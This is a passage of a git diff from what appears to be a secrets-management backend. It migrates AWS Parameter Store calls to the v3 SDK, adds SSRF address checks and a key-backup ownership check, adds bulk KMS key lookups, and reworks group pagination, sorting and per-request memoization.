true }) - .promise(); + ); } catch (error) { (error as { secretKey: string }).secretKey = key; throw error; @@ -950,8 +971,8 @@ const syncSecretsAWSParameterStore = async ({ if (metadata.secretAWSTag?.length) { try { - await ssm - .addTagsToResource({ + await ssm.send( + new AddTagsToResourceCommand({ ResourceType: "Parameter", ResourceId: `${integration.path}${key}`, Tags: metadata.secretAWSTag @@ -961,14 +982,13 @@ const syncSecretsAWSParameterStore = async ({ })) : [] }) - .promise(); + ); } catch (err) { logger.error( err, `getIntegrationSecrets: create secret in AWS SSM for failed [projectId=${projectId}] [environment=${integration.environment.slug}] [secretPath=${integration.secretPath}]` ); - // eslint-disable-next-line @typescript-eslint/no-explicit-any - if ((err as any).code === "AccessDeniedException") { + if (err instanceof AccessDeniedException) { logger.error( `AWS Parameter Store Error [integration=${integration.id}]: double check AWS account permissions (refer to the Infisical docs)` ); @@ -976,7 +996,7 @@ const syncSecretsAWSParameterStore = async ({ response = { isSynced: false, - syncMessage: (err as AWSError)?.message || "Error syncing with AWS Parameter Store" + syncMessage: (err as Error)?.message || "Error syncing with AWS Parameter Store" }; } } @@ -995,15 +1015,15 @@ const syncSecretsAWSParameterStore = async ({ // we ensure that the KMS key configured in the integration is applied for ALL parameters on AWS if (secrets[key].value && (shouldUpdateKms || awsParameterStoreSecretsObj[key].Value !== secrets[key].value)) { try { - await ssm - .putParameter({ + await ssm.send( + new PutParameterCommand({ Name: `${integration.path}${key}`, Type: "SecureString", Value: secrets[key].value, Overwrite: true, ...(metadata.kmsKeyId && { KeyId: metadata.kmsKeyId }) }) - .promise(); + ); } catch (error) { (error as { secretKey: string }).secretKey = key; throw error; @@ -1012,8 +1032,8 @@ const syncSecretsAWSParameterStore = async ({ if 
(awsParameterStoreSecretsObj[key].Name) { try { - await ssm - .addTagsToResource({ + await ssm.send( + new AddTagsToResourceCommand({ ResourceType: "Parameter", ResourceId: awsParameterStoreSecretsObj[key].Name as string, Tags: metadata.secretAWSTag @@ -1023,14 +1043,13 @@ const syncSecretsAWSParameterStore = async ({ })) : [] }) - .promise(); + ); } catch (err) { logger.error( err, `getIntegrationSecrets: update secret in AWS SSM for failed [projectId=${projectId}] [environment=${integration.environment.slug}] [secretPath=${integration.secretPath}]` ); - // eslint-disable-next-line @typescript-eslint/no-explicit-any - if ((err as any).code === "AccessDeniedException") { + if (err instanceof AccessDeniedException) { logger.error( `AWS Parameter Store Error [integration=${integration.id}]: double check AWS account permissions (refer to the Infisical docs)` ); @@ -1038,7 +1057,7 @@ const syncSecretsAWSParameterStore = async ({ response = { isSynced: false, - syncMessage: (err as AWSError)?.message || "Error syncing with AWS Parameter Store" + syncMessage: (err as Error)?.message || "Error syncing with AWS Parameter Store" }; } } @@ -1065,11 +1084,11 @@ const syncSecretsAWSParameterStore = async ({ ); // case: // -> delete secret - await ssm - .deleteParameter({ + await ssm.send( + new DeleteParameterCommand({ Name: awsParameterStoreSecretsObj[key].Name as string }) - .promise(); + ); logger.info( `getIntegrationSecrets: inside of shouldDisableDelete AWS SSM [projectId=${projectId}] [environment=${integration.environment.slug}] [secretPath=${integration.secretPath}] [step=4]` ); @@ -2561,6 +2580,7 @@ const syncSecretsDatabricks = async ({ }) => { const databricksApiUrl = `${integrationAuth.url}/api`; + await blockLocalAndPrivateIpAddresses(databricksApiUrl); // sync secrets to Databricks await Promise.all( Object.keys(secrets).map(async (key) => @@ -2750,6 +2770,7 @@ const syncSecretsAzureDevops = async ({ return { groupId: "", groupName: "" }; }; + await 
blockLocalAndPrivateIpAddresses(azureDevopsApiUrl); const { groupId, groupName } = await getEnvGroupId(integration.app, integration.appId, integration.environment.name); const variables: Record = {}; @@ -2851,6 +2872,11 @@ const syncSecretsGitLab = async ({ const gitLabApiUrl = integrationAuth.url ? `${integrationAuth.url}/api` : IntegrationUrls.GITLAB_API_URL; + // Validate the base URL to prevent SSRF on all subsequent requests + if (integrationAuth.url) { + await blockLocalAndPrivateIpAddresses(gitLabApiUrl); + } + const getAllEnvVariables = async (integrationAppId: string, accToken: string) => { const headers = { Authorization: `Bearer ${accToken}`, @@ -2862,6 +2888,7 @@ const syncSecretsGitLab = async ({ let url: string | null = `${gitLabApiUrl}/v4/projects/${integrationAppId}/variables?per_page=100`; while (url) { + await blockLocalAndPrivateIpAddresses(url); const response = await request.get(url, { headers }); allEnvVariables = [...allEnvVariables, ...response.data]; @@ -3562,6 +3589,9 @@ const syncSecretsTeamCity = async ({ property: TeamCityBuildConfigParameter[]; } + if (integrationAuth.url) { + await blockLocalAndPrivateIpAddresses(integrationAuth.url); + } if (integration.targetEnvironment && integration.targetEnvironmentId) { // case: sync to specific build-config in TeamCity project const res = ( @@ -3704,6 +3734,12 @@ const syncSecretsHashiCorpVault = async ({ throw new Error("Access ID is required"); } + if (!integrationAuth.url) { + throw new BadRequestError({ message: "HashiCorp Vault URL is required" }); + } + + await blockLocalAndPrivateIpAddresses(integrationAuth.url); + interface LoginAppRoleRes { auth: { client_token: string; @@ -3975,6 +4011,7 @@ const syncSecretsBitbucket = async ({ } if (data.next) { + await blockLocalAndPrivateIpAddresses(data.next); variablesUrl = data.next; } else { hasNextPage = false; @@ -4134,6 +4171,9 @@ const syncSecretsWindmill = async ({ description?: string; } const apiUrl = integration.url ? 
`${integration.url}/api` : IntegrationUrls.WINDMILL_API_URL; + if (apiUrl) { + await blockLocalAndPrivateIpAddresses(apiUrl); + } // get secrets stored in windmill workspace const res = ( await request.get(`${apiUrl}/w/${integration.appId}/variables/list`, { @@ -4458,7 +4498,11 @@ const syncSecretsRundeck = async ({ } let existingRundeckSecrets: string[] = []; + if (!integration.url) { + return; + } + await blockLocalAndPrivateIpAddresses(integration.url); try { const listResult = await request.get( `${integration.url}/api/44/storage/${integration.path}`, @@ -4532,6 +4576,8 @@ const syncSecretsOctopusDeploy = async ({ throw new InternalServerError({ message: `Unhandled Octopus Deploy scope: ${integration.scope}` }); } + await blockLocalAndPrivateIpAddresses(url); + // SDK doesn't support variable set... const { data: variableSet } = await request.get(url, { headers: { diff --git a/backend/src/services/integration/integration-service.ts b/backend/src/services/integration/integration-service.ts index 885450afe6e..faa1cccf1ff 100644 --- a/backend/src/services/integration/integration-service.ts +++ b/backend/src/services/integration/integration-service.ts @@ -10,6 +10,7 @@ import { } from "@app/ee/services/permission/project-permission"; import { NotFoundError } from "@app/lib/errors"; import { TProjectPermission } from "@app/lib/types"; +import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; import { TIntegrationAuthDALFactory } from "../integration-auth/integration-auth-dal"; import { TIntegrationAuthServiceFactory } from "../integration-auth/integration-auth-service"; @@ -108,6 +109,10 @@ export const integrationServiceFactory = ({ }); } + if (url) { + await blockLocalAndPrivateIpAddresses(url); + } + const integration = await integrationDAL.create({ envId: folder.envId, secretPath, diff --git a/backend/src/services/kms/kms-key-dal.ts b/backend/src/services/kms/kms-key-dal.ts index 36ffa336612..132c62bfbb1 100644 --- 
a/backend/src/services/kms/kms-key-dal.ts +++ b/backend/src/services/kms/kms-key-dal.ts @@ -93,6 +93,62 @@ export const kmskeyDALFactory = (db: TDbClient) => { } }; + const findByIdsWithAssociatedKms = async (ids: string[], tx?: Knex) => { + try { + const results = await (tx || db.replicaNode())(TableName.KmsKey) + .whereIn(`${TableName.KmsKey}.id`, ids) + .join(TableName.Organization, `${TableName.KmsKey}.orgId`, `${TableName.Organization}.id`) + .leftJoin(TableName.InternalKms, `${TableName.KmsKey}.id`, `${TableName.InternalKms}.kmsKeyId`) + .leftJoin(TableName.ExternalKms, `${TableName.KmsKey}.id`, `${TableName.ExternalKms}.kmsKeyId`) + .select(selectAllTableCols(TableName.KmsKey)) + .select( + db.ref("id").withSchema(TableName.InternalKms).as("internalKmsId"), + db.ref("encryptedKey").withSchema(TableName.InternalKms).as("internalKmsEncryptedKey"), + db.ref("encryptionAlgorithm").withSchema(TableName.InternalKms).as("internalKmsEncryptionAlgorithm"), + db.ref("version").withSchema(TableName.InternalKms).as("internalKmsVersion") + ) + .select( + db.ref("id").withSchema(TableName.ExternalKms).as("externalKmsId"), + db.ref("provider").withSchema(TableName.ExternalKms).as("externalKmsProvider"), + db.ref("encryptedProviderInputs").withSchema(TableName.ExternalKms).as("externalKmsEncryptedProviderInput"), + db.ref("status").withSchema(TableName.ExternalKms).as("externalKmsStatus"), + db.ref("statusDetails").withSchema(TableName.ExternalKms).as("externalKmsStatusDetails") + ) + .select( + db.ref("kmsDefaultKeyId").withSchema(TableName.Organization).as("orgKmsDefaultKeyId"), + db.ref("kmsEncryptedDataKey").withSchema(TableName.Organization).as("orgKmsEncryptedDataKey") + ); + + return results.map((result) => ({ + ...KmsKeysSchema.parse(result), + isExternal: Boolean(result?.externalKmsId), + orgKms: { + id: result?.orgKmsDefaultKeyId, + encryptedDataKey: result?.orgKmsEncryptedDataKey + }, + externalKms: result?.externalKmsId + ? 
{ + id: result.externalKmsId, + provider: result.externalKmsProvider, + encryptedProviderInput: result.externalKmsEncryptedProviderInput, + status: result.externalKmsStatus, + statusDetails: result.externalKmsStatusDetails + } + : undefined, + internalKms: result?.internalKmsId + ? { + id: result.internalKmsId, + encryptedKey: result.internalKmsEncryptedKey, + encryptionAlgorithm: result.internalKmsEncryptionAlgorithm, + version: result.internalKmsVersion + } + : undefined + })); + } catch (error) { + throw new DatabaseError({ error, name: "Find by ids with associated kms" }); + } + }; + const findProjectCmeks = async (projectId: string, tx?: Knex) => { try { const result = await (tx || db.replicaNode())(TableName.KmsKey) @@ -136,7 +192,10 @@ export const kmskeyDALFactory = (db: TDbClient) => { .where("projectId", projectId) .where((qb) => { if (search) { - void qb.whereILike("name", `%${search}%`); + const pattern = `%${search}%`; + void qb + .whereILike(`${TableName.KmsKey}.name`, pattern) + .orWhereRaw(`?? 
::text ILIKE ?`, [`${TableName.KmsKey}.id`, pattern]); } }) .where(`${TableName.KmsKey}.isReserved`, false) @@ -180,6 +239,14 @@ export const kmskeyDALFactory = (db: TDbClient) => { } }; + const findCmeksByIds = async (ids: string[], tx?: Knex) => { + try { + return await baseCmekQuery({ db, tx }).whereIn(`${TableName.KmsKey}.id`, ids); + } catch (error) { + throw new DatabaseError({ error, name: "Find cmeks by IDs" }); + } + }; + const findCmekByName = async (keyName: string, projectId: string, tx?: Knex) => { try { const key = await baseCmekQuery({ @@ -194,5 +261,14 @@ export const kmskeyDALFactory = (db: TDbClient) => { } }; - return { ...kmsOrm, findByIdWithAssociatedKms, listCmeksByProjectId, findCmekById, findCmekByName, findProjectCmeks }; + return { + ...kmsOrm, + findByIdWithAssociatedKms, + findByIdsWithAssociatedKms, + listCmeksByProjectId, + findCmekById, + findCmeksByIds, + findCmekByName, + findProjectCmeks + }; }; diff --git a/backend/src/services/kms/kms-service.ts b/backend/src/services/kms/kms-service.ts index ba025d9a206..28ddbdad7bd 100644 --- a/backend/src/services/kms/kms-service.ts +++ b/backend/src/services/kms/kms-service.ts @@ -21,6 +21,8 @@ import { AsymmetricKeyAlgorithm, signingService } from "@app/lib/crypto/sign"; import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; import { alphaNumericNanoId } from "@app/lib/nanoid"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { getByteLengthForSymmetricEncryptionAlgorithm, KMS_ROOT_CONFIG_UUID, @@ -43,6 +45,7 @@ import { TEncryptWithKmsDataKeyDTO, TEncryptWithKmsDTO, TGenerateKMSDTO, + TGetBulkKeyMaterialDTO, TGetKeyMaterialDTO, TGetPublicKeyDTO, TImportKeyMaterialDTO, @@ -379,6 +382,24 @@ export const kmsServiceFactory = ({ return kmsKey; }; + const getBulkKeyMaterial = async ({ kmsIds }: TGetBulkKeyMaterialDTO) 
=> { + const kmsDocs = await kmsDAL.findByIdsWithAssociatedKms(kmsIds); + + return kmsDocs.map((kmsDoc) => { + if (kmsDoc.isReserved) { + throw new BadRequestError({ message: `Cannot get key material for reserved key [kmsId=${kmsDoc.id}]` }); + } + if (kmsDoc.externalKms) { + throw new BadRequestError({ message: `Cannot get key material for external key [kmsId=${kmsDoc.id}]` }); + } + + const keyCipher = symmetricCipherService(SymmetricKeyAlgorithm.AES_GCM_256); + const keyMaterial = keyCipher.decrypt(kmsDoc.internalKms?.encryptedKey as Buffer, ROOT_ENCRYPTION_KEY); + + return { kmsId: kmsDoc.id, name: kmsDoc.name, keyMaterial }; + }); + }; + const importKeyMaterial = async ( { key, algorithm, name, isReserved, projectId, orgId, keyUsage, kmipMetadata }: TImportKeyMaterialDTO, tx?: Knex @@ -899,7 +920,9 @@ export const kmsServiceFactory = ({ }; const getProjectKeyBackup = async (projectId: string) => { - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); if (!project) { throw new NotFoundError({ message: `Project with ID '${projectId}' not found` @@ -953,6 +976,12 @@ export const kmsServiceFactory = ({ }); } + const kmsDoc = await kmsDAL.findByIdWithAssociatedKms(backupKmsKeyId); + if (kmsDoc.orgId !== project.orgId) + throw new ForbiddenRequestError({ + message: "Backup does not belong to project" + }); + const kmsDecryptor = await decryptWithKmsKey({ kmsId: backupKmsKeyId }); const dataKey = await kmsDecryptor({ cipherTextBlob: Buffer.from(backupBase64EncryptedDataKey, "base64") @@ -1085,6 +1114,7 @@ export const kmsServiceFactory = ({ getKmsById, createCipherPairWithDataKey, getKeyMaterial, + getBulkKeyMaterial, importKeyMaterial, signWithKmsKey, verifyWithKmsKey, diff --git a/backend/src/services/kms/kms-types.ts b/backend/src/services/kms/kms-types.ts index 11badd7a510..f2c05b6ad89 100644 --- a/backend/src/services/kms/kms-types.ts 
+++ b/backend/src/services/kms/kms-types.ts @@ -91,6 +91,10 @@ export type TGetKeyMaterialDTO = { kmsId: string; }; +export type TGetBulkKeyMaterialDTO = { + kmsIds: string[]; +}; + export type TImportKeyMaterialDTO = { key: Buffer; algorithm: SymmetricKeyAlgorithm; diff --git a/backend/src/services/membership-group/membership-group-dal.ts b/backend/src/services/membership-group/membership-group-dal.ts index 121596c74a0..8c266c0a270 100644 --- a/backend/src/services/membership-group/membership-group-dal.ts +++ b/backend/src/services/membership-group/membership-group-dal.ts @@ -6,6 +6,9 @@ import { BadRequestError, DatabaseError } from "@app/lib/errors"; import { ormify, selectAllTableCols, sqlNestRelationships } from "@app/lib/knex"; import { buildKnexFilterForSearchResource } from "@app/lib/search-resource/db"; import { TSearchResourceOperator } from "@app/lib/search-resource/search"; +import { OrderByDirection } from "@app/lib/types"; + +import { OrgGroupsOrderBy } from "./membership-group-types"; export type TMembershipGroupDALFactory = ReturnType; @@ -18,6 +21,8 @@ type TFindGroupArg = { groupId: string; name: Omit; role: Omit; + orderBy: OrgGroupsOrderBy; + orderDirection: OrderByDirection; }>; }; @@ -132,12 +137,12 @@ export const membershipGroupDALFactory = (db: TDbClient) => { const findGroups = async ({ scopeData, tx, filter }: TFindGroupArg) => { try { - const paginatedGroups = (tx || db.replicaNode())(TableName.Membership) + // Base filtered query (no pagination) β€” shared for count and ID subquery + const baseFilterQuery = (tx || db.replicaNode())(TableName.Membership) .whereNotNull(`${TableName.Membership}.actorGroupId`) .join(TableName.Groups, `${TableName.Groups}.id`, `${TableName.Membership}.actorGroupId`) .join(TableName.MembershipRole, `${TableName.Membership}.id`, `${TableName.MembershipRole}.membershipId`) .leftJoin(TableName.Role, `${TableName.MembershipRole}.customRoleId`, `${TableName.Role}.id`) - .distinct(`${TableName.Membership}.id`) 
.where(`${TableName.Membership}.scopeOrgId`, scopeData.orgId) .where((qb) => { if (filter.groupId) { @@ -153,15 +158,12 @@ export const membershipGroupDALFactory = (db: TDbClient) => { } }); - if (filter.limit) void paginatedGroups.limit(filter.limit); - if (filter.offset) void paginatedGroups.offset(filter.offset); - if (filter.name || filter.role) { buildKnexFilterForSearchResource( - paginatedGroups, + baseFilterQuery, { - name: filter.name!, - role: filter.role! + ...(filter.name && { name: filter.name }), + ...(filter.role && { role: filter.role }) }, (attr) => { switch (attr) { @@ -176,14 +178,53 @@ export const membershipGroupDALFactory = (db: TDbClient) => { ); } + // Count total matching groups (without pagination) + const [countResult] = (await baseFilterQuery.clone().countDistinct(`${TableName.Membership}.id as count`)) as [ + { count: string | number }? + ]; + const totalCount = Number(countResult?.count ?? 0); + + const dir = filter.orderDirection === OrderByDirection.DESC ? 
"DESC" : "ASC"; + + const paginatedGroupByColumns = [`${TableName.Membership}.id`, `${TableName.Groups}.name`]; + let paginatedOrderByRaw: string; + let outerOrderByRaw: string; + + switch (filter.orderBy) { + case OrgGroupsOrderBy.Slug: + paginatedGroupByColumns.push(`${TableName.Groups}.slug`); + paginatedOrderByRaw = `LOWER("${TableName.Groups}"."slug") ${dir}`; + outerOrderByRaw = `LOWER("${TableName.Groups}"."slug") ${dir}`; + break; + case OrgGroupsOrderBy.Role: + paginatedOrderByRaw = `MIN(LOWER(COALESCE("${TableName.Role}"."slug", "${TableName.MembershipRole}"."role"))) ${dir}`; + outerOrderByRaw = `LOWER(COALESCE("${TableName.Role}"."slug", "${TableName.MembershipRole}"."role")) ${dir}`; + break; + default: + paginatedOrderByRaw = `LOWER("${TableName.Groups}"."name") ${dir}`; + outerOrderByRaw = `LOWER("${TableName.Groups}"."name") ${dir}`; + } + + // Paginated IDs subquery + const paginatedGroups = baseFilterQuery + .clone() + .clearSelect() + .select(`${TableName.Membership}.id`) + .groupBy(...paginatedGroupByColumns) + .orderByRaw(paginatedOrderByRaw) + .orderBy(`${TableName.Membership}.id`, "asc"); + if (filter.limit) void paginatedGroups.limit(filter.limit); + if (filter.offset) void paginatedGroups.offset(filter.offset); + const docs = await (tx || db.replicaNode())(TableName.Membership) .whereNotNull(`${TableName.Membership}.actorGroupId`) .join(TableName.Groups, `${TableName.Groups}.id`, `${TableName.Membership}.actorGroupId`) .join(TableName.MembershipRole, `${TableName.Membership}.id`, `${TableName.MembershipRole}.membershipId`) .leftJoin(TableName.Role, `${TableName.MembershipRole}.customRoleId`, `${TableName.Role}.id`) - .distinct(`${TableName.Membership}.id`) .where(`${TableName.Membership}.scopeOrgId`, scopeData.orgId) .whereIn(`${TableName.Membership}.id`, paginatedGroups) + .orderByRaw(outerOrderByRaw) + .orderBy(`${TableName.Membership}.id`, "asc") .select(selectAllTableCols(TableName.Membership)) .select( 
db.ref("name").withSchema(TableName.Groups).as("groupName"), @@ -208,11 +249,6 @@ export const membershipGroupDALFactory = (db: TDbClient) => { .as("membershipRoleTemporaryAccessEndTime"), db.ref("createdAt").withSchema(TableName.MembershipRole).as("membershipRoleCreatedAt"), db.ref("updatedAt").withSchema(TableName.MembershipRole).as("membershipRoleUpdatedAt") - ) - .select( - db.raw( - `count(${TableName.Membership}."actorGroupId") OVER(PARTITION BY ${TableName.Membership}."scopeOrgId") as total` - ) ); const data = sqlNestRelationships({ @@ -262,7 +298,7 @@ export const membershipGroupDALFactory = (db: TDbClient) => { } ] }); - return { data, totalCount: Number((data?.[0] as unknown as { total: number })?.total ?? 0) }; + return { data, totalCount }; } catch (error) { throw new DatabaseError({ error, name: "MembershipfindGroup" }); } diff --git a/backend/src/services/membership-group/membership-group-service.ts b/backend/src/services/membership-group/membership-group-service.ts index 67cf525632c..372ec3f3441 100644 --- a/backend/src/services/membership-group/membership-group-service.ts +++ b/backend/src/services/membership-group/membership-group-service.ts @@ -384,9 +384,11 @@ export const membershipGroupServiceFactory = ({ filter: { limit: dto.data.limit, offset: dto.data.offset, - name: dto.data.groupName + orderBy: dto.data.orderBy, + orderDirection: dto.data.orderDirection, + name: dto.data.search ? 
{ - [SearchResourceOperators.$contains]: dto.data.groupName + [SearchResourceOperators.$contains]: dto.data.search } : undefined, role: dto.data.roles?.length diff --git a/backend/src/services/membership-group/membership-group-types.ts b/backend/src/services/membership-group/membership-group-types.ts index 05093ab4022..89b0a58396b 100644 --- a/backend/src/services/membership-group/membership-group-types.ts +++ b/backend/src/services/membership-group/membership-group-types.ts @@ -1,5 +1,11 @@ import { AccessScopeData, TemporaryPermissionMode } from "@app/db/schemas"; -import { OrgServiceActor } from "@app/lib/types"; +import { OrderByDirection, OrgServiceActor } from "@app/lib/types"; + +export enum OrgGroupsOrderBy { + Name = "name", + Slug = "slug", + Role = "role" +} export interface TMembershipGroupScopeFactory { onCreateMembershipGroupGuard: (arg: TCreateMembershipGroupDTO) => Promise; @@ -56,8 +62,10 @@ export type TListMembershipGroupDTO = { data: { limit?: number; offset?: number; - groupName?: string; + search?: string; roles?: string[]; + orderBy?: OrgGroupsOrderBy; + orderDirection?: OrderByDirection; }; }; diff --git a/backend/src/services/membership-group/org/org-membership-group-factory.ts b/backend/src/services/membership-group/org/org-membership-group-factory.ts index ff37c6cf3a2..8eb7171944b 100644 --- a/backend/src/services/membership-group/org/org-membership-group-factory.ts +++ b/backend/src/services/membership-group/org/org-membership-group-factory.ts @@ -13,6 +13,8 @@ import { } from "@app/ee/services/permission/permission-fns"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { BadRequestError, InternalServerError, PermissionBoundaryError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TOrgDALFactory } from "@app/services/org/org-dal"; import { 
isCustomOrgRole } from "@app/services/org/org-role-fns"; @@ -86,7 +88,10 @@ export const newOrgMembershipGroupFactory = ({ dto.data.roles.map((el) => el.role), dto.permission.orgId ); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); for (const permissionRole of permissionRoles) { if (permissionRole?.role?.name !== OrgMembershipRole.NoAccess) { const permissionBoundary = validatePrivilegeChangeOperation( @@ -125,7 +130,10 @@ export const newOrgMembershipGroupFactory = ({ dto.permission.orgId ); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); for (const permissionRole of permissionRoles) { if (permissionRole?.role?.name !== OrgMembershipRole.NoAccess) { const permissionBoundary = validatePrivilegeChangeOperation( diff --git a/backend/src/services/membership-group/project/project-membership-group-factory.ts b/backend/src/services/membership-group/project/project-membership-group-factory.ts index 5561ebec228..94527e2193f 100644 --- a/backend/src/services/membership-group/project/project-membership-group-factory.ts +++ b/backend/src/services/membership-group/project/project-membership-group-factory.ts @@ -13,6 +13,8 @@ import { ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { BadRequestError, InternalServerError, PermissionBoundaryError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TOrgDALFactory } from "@app/services/org/org-dal"; import { TMembershipGroupDALFactory } from 
"../membership-group-dal"; @@ -69,7 +71,10 @@ export const newProjectMembershipGroupFactory = ({ const groupDetails = await groupDAL.findById(dto.data.groupId); if (!groupDetails) throw new BadRequestError({ message: "Group details not found" }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const permissionRoles = await permissionService.getProjectPermissionByRoles( dto.data.roles.map((el) => el.role), scope.value @@ -122,7 +127,10 @@ export const newProjectMembershipGroupFactory = ({ const groupDetails = await groupDAL.findById(dto.selector.groupId); if (!groupDetails) throw new BadRequestError({ message: "Group details not found" }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const permissionRoles = await permissionService.getProjectPermissionByRoles( dto.data.roles.map((el) => el.role), scope.value diff --git a/backend/src/services/membership-identity/org/org-membership-identity-factory.ts b/backend/src/services/membership-identity/org/org-membership-identity-factory.ts index 8a95a55f4ea..d7a46516501 100644 --- a/backend/src/services/membership-identity/org/org-membership-identity-factory.ts +++ b/backend/src/services/membership-identity/org/org-membership-identity-factory.ts @@ -8,6 +8,8 @@ import { } from "@app/ee/services/permission/permission-fns"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { BadRequestError, InternalServerError, PermissionBoundaryError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from 
"@app/lib/request-context/request-memoizer"; import { TIdentityDALFactory } from "@app/services/identity/identity-dal"; import { TOrgDALFactory } from "@app/services/org/org-dal"; import { isCustomOrgRole } from "@app/services/org/org-role-fns"; @@ -69,7 +71,10 @@ export const newOrgMembershipIdentityFactory = ({ dto.permission.orgId ); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); for (const permissionRole of permissionRoles) { if (permissionRole?.role?.name !== OrgMembershipRole.NoAccess) { const permissionBoundary = validatePrivilegeChangeOperation( @@ -111,7 +116,10 @@ export const newOrgMembershipIdentityFactory = ({ dto.permission.orgId ); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); for (const permissionRole of permissionRoles) { if (permissionRole?.role?.name !== OrgMembershipRole.NoAccess) { const permissionBoundary = validatePrivilegeChangeOperation( diff --git a/backend/src/services/membership-identity/project/project-membership-identity-factory.ts b/backend/src/services/membership-identity/project/project-membership-identity-factory.ts index 17c7e0f16ac..d67e60c67d0 100644 --- a/backend/src/services/membership-identity/project/project-membership-identity-factory.ts +++ b/backend/src/services/membership-identity/project/project-membership-identity-factory.ts @@ -12,6 +12,8 @@ import { ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { BadRequestError, InternalServerError, PermissionBoundaryError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { 
requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TIdentityDALFactory } from "@app/services/identity/identity-dal"; import { TOrgDALFactory } from "@app/services/org/org-dal"; @@ -78,7 +80,10 @@ export const newProjectMembershipIdentityFactory = ({ throw new BadRequestError({ message: "Failed to create project membership for a project scoped identity" }); } - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const permissionRoles = await permissionService.getProjectPermissionByRoles( dto.data.roles.map((el) => el.role), scope.value @@ -133,7 +138,10 @@ export const newProjectMembershipIdentityFactory = ({ throw new BadRequestError({ message: "Failed to update project membership for a project scoped identity" }); } - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const permissionRoles = await permissionService.getProjectPermissionByRoles( dto.data.roles.filter((el) => el.role !== ProjectMembershipRole.NoAccess).map((el) => el.role), scope.value diff --git a/backend/src/services/membership-user/membership-user-service.ts b/backend/src/services/membership-user/membership-user-service.ts index e0a3503f6ff..d3f02d0ccc9 100644 --- a/backend/src/services/membership-user/membership-user-service.ts +++ b/backend/src/services/membership-user/membership-user-service.ts @@ -12,6 +12,8 @@ import { TPermissionServiceFactory } from "@app/ee/services/permission/permissio import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { groupBy } from "@app/lib/fn"; import { ms } from "@app/lib/ms"; +import { requestMemoKeys } from 
"@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { SearchResourceOperators } from "@app/lib/search-resource/search"; import { isDisposableEmail, sanitizeEmail, validateEmail } from "@app/lib/validator"; @@ -163,7 +165,9 @@ export const membershipUserServiceFactory = ({ const { scopeData, data } = dto; const factory = scopeFactory[scopeData.scope]; - const orgDetails = await orgDAL.findById(dto.permission.orgId); + const orgDetails = await requestMemoize(requestMemoKeys.orgFindById(dto.permission.orgId), () => + orgDAL.findById(dto.permission.orgId) + ); // If roles array is empty and scope is Organization, use org's default role let rolesToUse = data.roles; @@ -532,7 +536,9 @@ export const membershipUserServiceFactory = ({ await factory.onListMembershipUserGuard(dto); - const organizationDetails = await orgDAL.findById(dto.scopeData.orgId); + const organizationDetails = await requestMemoize(requestMemoKeys.orgFindById(dto.scopeData.orgId), () => + orgDAL.findById(dto.scopeData.orgId) + ); if (!organizationDetails.rootOrgId) return { users: [] }; const users = await membershipUserDAL.listAvailableUsers(organizationDetails.id, organizationDetails.rootOrgId); diff --git a/backend/src/services/membership-user/org/org-membership-user-factory.ts b/backend/src/services/membership-user/org/org-membership-user-factory.ts index 8e9b2aa2f2d..a866a218cfa 100644 --- a/backend/src/services/membership-user/org/org-membership-user-factory.ts +++ b/backend/src/services/membership-user/org/org-membership-user-factory.ts @@ -7,6 +7,8 @@ import { OrgPermissionActions, OrgPermissionSubjects } from "@app/ee/services/pe import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { getConfig } from "@app/lib/config/env"; import { BadRequestError, ForbiddenRequestError, InternalServerError } from 